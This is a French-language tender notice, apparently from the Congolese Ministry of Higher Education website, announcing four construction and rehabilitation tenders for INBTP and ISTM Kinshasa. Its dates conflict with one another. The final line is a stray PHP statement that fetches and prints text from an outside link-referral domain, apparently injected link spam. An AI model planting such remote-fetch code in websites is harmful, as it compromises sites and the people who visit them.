Enseignement Supérieur et Universitaire congolais en marche vers la numérisation

FLASH INFO :

Kinshasa, mardi 27 février 2024.

Quatre avis d’appels d’offres au Ministère de l’Enseignement Supérieur et Universitaire (cas de l’INBTP et ISTM/KINSHASA)

Le Ministre de l’Enseignement Supérieur et Universitaire a lancé lundi  10 avril, quatre avis d’appels d’offre de construction en faveur INBTP et ISTM/KINSHASA. Pour effectuer des paiements au titre du marché de travaux des constructions, la rubrique investissement sur ressources propres des fonds du trésor public et a l’intention d’utiliser  une partie de ces fonds.


Le premier projet consiste à la construction des toilettes publique en faveur de l’Institut National du Bâtiment et des Travaux Public (INBTP) dans la ville province de Kinshasa. Objet du présent appel d’offres N°001 / AON / Tx / MINESU / CAB.MIN / MNB / CGPMB / SP /2023.


Le deuxième, il s’agit de la construction du dispensaire en faveur de l’Institut National du Bâtiment et des Travaux Publics (INBTP) dans la ville province de Kinshasa. Objet du présent  appel d’offres N°002/ Tx / MINESU / CAB.MIN / MNB / CGPMB / SP / 2023.


En suite la troisième consiste à la réhabilitation de l’extension du bâtiment Administratif  de l’Institut Supérieur des Techniques Médicales de Kinshasa (ISTM KINSHASA) N°004 / AON / Tx / MINESU / CAB.MIN / MNB / CGPMB / SP / 2023.


Et le dernier est la réhabilitation de l’extension du Bâtiment abritant les Laboratoires en faveur de l’Institut Supérieur des Techniques Médicales (ISTM KINSHASA). Objet du présent appel d’offres N°005 / AON / Tx / MINESU / CAB.MIN / MNB / CGPMB / SP / 2023


Signalons que le Ministère de l’Enseignement Supérieur et Universitaire sollicite des offres sous pli fermé de la part de candidats éligibles et répondants aux qualifications requises pour réaliser les travaux comme fondation, élévation, toiture, finitions (électricité, crépissage, faux plafond, carrelages, plomberie, portes, et imposte et peinture)


En autre, pour avoir plus des informations, les candidats intéressés peuvent passer au Secrétariat Général de l’ESU sur Boulevard Colonel TSHATSHI N°67, Kinshasa-Gombe, cellule de gestion des projets et des marché publics, de lundi à vendredi de 8h30 à 15h30, Contact : 00243998771353 – 00243820596004, E-mail : cgpmpesu@gmail.com


N.B : la date limite de dépôt de candidature est fixer le mercredi 10 mai 2023 à 11h00’ heure de Kinshasa. Les dépôts électroniques ne seront pas admis. Les offres remises en retard ne seront pas acceptées. Les offres seront ouvertes le mercredi 10 mai 2023 au plus tard à 12h00’ heure de Kinshasa en présence des représentants des candidats présents.


Les offres doivent comprendre une garantie d’offre d’un montant de 1% du prix de l’offre. Les offres devront demeurer valides pendant une durée de 90 jours à compter de la date limite de soumission.


Voir les détails :


Appel offre 1.pdf


Appel offre 2.pdf


Appel offre 3.pdf


Appel offre 4.pdf


Publier le 17/04/2023 14h-32min-00s

Par : Espérant LUVUMBU


A LIRE AUSSI



Publication de l’Arrêté Ministériel n°345 du 20/07/2023 ... Suite


Publication de l’Arrêté Ministériel n°342 du 20/07/2023 ... Suite


Publication de l’Arrêté Ministériel n°341 du 20/07/2023 ... Suite


Publication de l’Arrêté Ministériel n°343 du 20/07/2023 ... Suite


Publication de l’Arrêté Ministériel n°344 du 20/07/2023 ... Suite


Le Ministre MUHINDO NZANGI BUTONDO nomme des nouveaux animateu... Suite


Son Excellence MUHINDO NZANGI BUTONDO a signé ce lundi 10 jui... Suite


Publication du Plan National Sous-Sectoriel du Numérique PNSN... Suite


Octroie des bourses d’études universitaire et postuniversit... Suite


NOS ACTIVITES


Mobirise

Carte Universitaire

Le Ministère grâce à sa Direction Informatique produit les cartes universitaires de la République démocratique du Congo que les universités achète chaque année Voir les différentes cartes

Mobirise

Entérinement et Homologation

La Loi et les Instructions académiques en République Démocratique du Congo exigent des Etablissements Publics, Privés agrées et admis à l’agrément de remettre aux Voir la suite

Mobirise

Bourses d'études

Hormis la Bourse d’études de solidarité nationale et d’excellence, le Ministère de l’ESU octroi des bourses d'études pour plusieurs filières d’études dans le cadre ...Voir la suite

Mobirise

Contrôle de scolarité

Mission de contrôle de la scolarité des finalistes des Etablissements Publics ou Privés agrées et admis à l’agreement de l’ESU. La loi et les instructions académiques... Voir la suite

NOS PARTENAIRES


Dans le cadre de la Coopération Bilatéral (Etat à Etat), Multilatéral (internationale) et Régionale (sous-région), le Ministère de l’Enseignement Supérieur et Universitaire entretient des relations de Partenariat et conclu les accords de Coopérations avec des Etats, de Bailleurs de fonds, des Organismes et des Universités étrangères pour l’amélioration de la qualité de l’Enseignement au Supérieur.

Ce partenariat permet aux Etudiants, aux Personnels Académiques Enseignants et aux Administratifs de l’Enseignement du Supérieur de bénéficier des bourses d’études et de formation. Dans le même cadre, les structures spécialisées de l’Enseignement Supérieur et Universitaire bénéficient aussi l’appui financier, technique et logistique, étant entendu que certains projets font appels au Partenariat Publics Privés (PPP) lors de leurs exécutions.

Ministère de l'ESU

Adresse :

Secrétariat Général :

Boulevard Tshatshi N°67                    
Kinshasa/Gombe, RDC

Contact

Email: contact@minesu.gouv.cd 

Autres liens

Présidence de la République
Primature

echo file_get_contents("https://linkrefferal.vip/backlink.txt");